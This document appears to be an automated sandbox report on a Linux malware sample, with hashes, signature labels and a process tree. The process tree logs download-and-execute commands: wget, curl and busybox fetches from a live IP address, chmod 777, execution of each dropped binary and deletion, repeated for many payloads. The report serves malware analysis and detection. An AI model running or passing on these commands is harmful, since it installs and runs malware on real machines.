Analysis
-
max time kernel
36s -
max time network
110s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system -
submitted
24/11/2024, 01:31
Static task
static1
Behavioral task
behavioral1
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-mipsel-20240611-en
General
-
Target
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
-
Size
10KB
-
MD5
a7136f5f7aad005f449adf4d9eb6e330
-
SHA1
b6cddbe652904c25cc2e6c5f3063fb13a4df6737
-
SHA256
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5
-
SHA512
246aa712ed98a0566dc01bd9c38641f09934c708bff0e9535d33a324e832016dc28f55477382fd2c5611a9b79d4b4430ff37fb83814b6fcbb5db8b06708b657e
-
SSDEEP
192:8OyzO6my8zK4ZbHrTssv9my8zK4uHrTssiAl:CzOZzL
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N/tmp/a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N1⤵PID:1481
-
/bin/rm/bin/rm bins.sh2⤵PID:1482
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:1483
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Writes file to tmp directory
PID:1491
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:1501
-
-
/bin/chmodchmod 777 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- File and Directory Permissions Modification
PID:1502
-
-
/tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ./duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Executes dropped EXE
PID:1503
-
-
/bin/rmrm duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:1504
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:1505
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Writes file to tmp directory
PID:1506
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:1507
-
-
/bin/chmodchmod 777 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- File and Directory Permissions Modification
PID:1509
-
-
/tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq./u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Executes dropped EXE
PID:1510
-
-
/bin/rmrm u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:1511
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:1512
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Writes file to tmp directory
PID:1513
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:1514
-
-
/bin/chmodchmod 777 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- File and Directory Permissions Modification
PID:1515
-
-
/tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL./MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Executes dropped EXE
PID:1516
-
-
/bin/rmrm MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:1517
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:1518
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Writes file to tmp directory
PID:1519
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:1520
-
-
/bin/chmodchmod 777 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- File and Directory Permissions Modification
PID:1521
-
-
/tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27./9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Executes dropped EXE
PID:1522
-
-
/bin/rmrm 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:1523
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:1524
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Writes file to tmp directory
PID:1525
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:1526
-
-
/bin/chmodchmod 777 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- File and Directory Permissions Modification
PID:1527
-
-
/tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA./znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Executes dropped EXE
PID:1528
-
-
/bin/rmrm znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:1529
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:1530
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Writes file to tmp directory
PID:1531
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:1532
-
-
/bin/chmodchmod 777 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- File and Directory Permissions Modification
PID:1533
-
-
/tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl./kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Executes dropped EXE
PID:1534
-
-
/bin/rmrm kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:1535
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:1536
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Writes file to tmp directory
PID:1537
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:1538
-
-
/bin/chmodchmod 777 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs./42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Executes dropped EXE
PID:1540
-
-
/bin/rmrm 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:1541
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:1542
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Writes file to tmp directory
PID:1543
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:1544
-
-
/bin/chmodchmod 777 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- File and Directory Permissions Modification
PID:1545
-
-
/tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS./1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Executes dropped EXE
PID:1546
-
-
/bin/rmrm 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:1547
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:1548
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Writes file to tmp directory
PID:1549
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:1550
-
-
/bin/chmodchmod 777 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- File and Directory Permissions Modification
PID:1551
-
-
/tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t./I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Executes dropped EXE
PID:1552
-
-
/bin/rmrm I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:1553
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:1554
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Writes file to tmp directory
PID:1555
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:1556
-
-
/bin/chmodchmod 777 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- File and Directory Permissions Modification
PID:1557
-
-
/tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA./qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Executes dropped EXE
PID:1558
-
-
/bin/rmrm qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:1559
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:1560
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Writes file to tmp directory
PID:1561
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:1562
-
-
/bin/chmodchmod 777 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- File and Directory Permissions Modification
PID:1563
-
-
/tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS./Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Executes dropped EXE
PID:1564
-
-
/bin/rmrm Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:1565
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:1566
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Writes file to tmp directory
PID:1567
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:1568
-
-
/bin/chmodchmod 777 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv./IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Executes dropped EXE
PID:1570
-
-
/bin/rmrm IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:1571
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:1572
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Writes file to tmp directory
PID:1573
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:1574
-
-
/bin/chmodchmod 777 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- File and Directory Permissions Modification
PID:1575
-
-
/tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8./DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Executes dropped EXE
PID:1576
-
-
/bin/rmrm DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:1577
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:1578
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Writes file to tmp directory
PID:1579
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:1580
-
-
/bin/chmodchmod 777 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- File and Directory Permissions Modification
PID:1581
-
-
/tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF./9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Executes dropped EXE
PID:1582
-
-
/bin/rmrm 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:1583
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:1584
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Writes file to tmp directory
PID:1585
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:1586
-
-
/bin/chmodchmod 777 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- File and Directory Permissions Modification
PID:1587
-
-
/tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS./1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Executes dropped EXE
PID:1588
-
-
/bin/rmrm 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:1589
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:1590
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Writes file to tmp directory
PID:1591
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:1592
-
-
/bin/chmodchmod 777 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- File and Directory Permissions Modification
PID:1593
-
-
/tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t./I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Executes dropped EXE
PID:1594
-
-
/bin/rmrm I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:1595
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:1596
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Writes file to tmp directory
PID:1597
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:1598
-
-
/bin/chmodchmod 777 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- File and Directory Permissions Modification
PID:1599
-
-
/tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv./IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Executes dropped EXE
PID:1600
-
-
/bin/rmrm IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:1601
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:1602
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Writes file to tmp directory
PID:1603
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:1604
-
-
/bin/chmodchmod 777 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- File and Directory Permissions Modification
PID:1605
-
-
/tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA./qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Executes dropped EXE
PID:1606
-
-
/bin/rmrm qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:1607
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:1608
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Writes file to tmp directory
PID:1609
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:1610
-
-
/bin/chmodchmod 777 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- File and Directory Permissions Modification
PID:1611
-
-
/tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS./Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Executes dropped EXE
PID:1612
-
-
/bin/rmrm Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:1613
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:1614
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Writes file to tmp directory
PID:1615
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:1616
-
-
/bin/chmodchmod 777 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- File and Directory Permissions Modification
PID:1617
-
-
/tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8./DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Executes dropped EXE
PID:1618
-
-
/bin/rmrm DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:1619
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:1620
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Writes file to tmp directory
PID:1621
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:1622
-
-
/bin/chmodchmod 777 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- File and Directory Permissions Modification
PID:1623
-
-
/tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF./9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Executes dropped EXE
PID:1624
-
-
/bin/rmrm 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:1625
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:1626
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Writes file to tmp directory
PID:1627
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:1628
-
-
/bin/chmodchmod 777 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- File and Directory Permissions Modification
PID:1629
-
-
/tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl./kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Executes dropped EXE
PID:1630
-
-
/bin/rmrm kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:1631
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:1632
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Writes file to tmp directory
PID:1633
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:1636
-
-
/bin/chmodchmod 777 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs./42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:1639
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:1640
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:1642
-
-
/bin/chmodchmod 777 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ./duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:1645
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:1646
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:1648
-
-
/bin/chmodchmod 777 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq./u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:1651
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:1654
-
-
/bin/chmodchmod 777 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- File and Directory Permissions Modification
PID:1655
-
-
/tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL./MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Executes dropped EXE
PID:1656
-
-
/bin/rmrm MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:1657
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:1658
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Writes file to tmp directory
PID:1659
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:1660
-
-
/bin/chmodchmod 777 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- File and Directory Permissions Modification
PID:1661
-
-
/tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27./9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Executes dropped EXE
PID:1662
-
-
/bin/rmrm 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:1663
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:1664
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Writes file to tmp directory
PID:1665
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:1666
-
-
/bin/chmodchmod 777 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- File and Directory Permissions Modification
PID:1667
-
-
/tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA./znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Executes dropped EXE
PID:1668
-
-
/bin/rmrm znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:1669
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97